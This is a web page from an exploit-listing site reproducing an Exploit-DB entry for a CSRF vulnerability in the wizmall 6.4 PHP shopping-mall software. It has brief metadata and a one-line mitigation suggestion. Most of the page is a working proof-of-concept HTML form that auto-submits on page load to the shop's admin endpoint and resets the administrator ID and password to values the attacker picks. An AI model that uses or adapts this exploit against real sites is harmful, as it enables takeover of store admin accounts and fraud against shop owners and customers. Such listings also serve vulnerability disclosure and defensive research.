Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
wizmall 6.4 CSRF Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
wizmall
by:
pyw1414
5.5
CVSS
MEDIUM
CSRF
352
CWE
Product Name: wizmall
Affected Version From: 6.4 UTF-8 For php
Affected Version To: 6.4 UTF-8 For php
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

wizmall 6.4 CSRF Vulnerabilities

CSRF exploit for wizmall 6.4 UTF-8 For php that allows changing admin ID and password.

Mitigation:

Implement CSRF protection mechanisms, such as using unique tokens for each request.
Source

Exploit-DB raw data:

# Exploit Title: wizmall 6.4 CSRF Vulnerabilities 
# Date: 08/10/2010
# Author: pyw1414 <i2SEC>
# Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0
# Version: 6.4 UTF-8 For php
# Tested on: XP SP3



-=[ CSRF Exploit - Change Admin ID/PW  ]=-

<html>
<head>
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
</head>

<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
<!--- Edit these --->
<input type="hidden" name="ID" value="i2sec" />  
<input type="hidden" name="PASS" value="test1234" />  
<input type="hidden" name="PASS1" value="test1234" /> 

<!--- Do not edit below ---> 
<input type="hidden" name="menushow" value="menu1" />  
<input type="hidden" name="theme" value="basicconfig/basic_info2" />  
<input type="hidden" name="action" value="admin_save" />  
<input type="hidden" name="ADMIN_NAME" value="pyw1414" />
<input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />  
<input type="hidden" name="ADMIN_TITLE_E" value="" />  
<input type="hidden" name="COMPANY_DOMAIN" value="" />
<input type="hidden" name="str_watermark" value="" />  
<input type="hidden" name="img_watermark" value="" />  
<input type="hidden" name="HOME_URL" value="" />  
<input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />  
<input type="hidden" name="ADMIN_TEL" value="" />
<input type="hidden" name="COMPANY_NAME" value="i2Sec" />  
<input type="hidden" name="PRESIDENT" value="" />  
<input type="hidden" name="COMPANY_NUM" value="" />  
<input type="hidden" name="COMPLICENCE_NUM" value="" />  
<input type="hidden" name="CUSTOMER_TEL" value="" />
<input type="hidden" name="CUSTOMER_FAX" value="" />  
<input type="hidden" name="COMPANY_ADD" value="" />  
<input type="hidden" name="COMPLICENCE_NUM" value="" />  
<input type="hidden" name="MART_BASEDIR" value="" />
<input type="hidden" name="SYSTEM_BASEDIR" value="" />  
<input type="hidden" name="smsModule" value="ANYSMS" />  
<input type="hidden" name="sms_id" value="" />  
<input type="hidden" name="sms_pwd" value="" />

</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR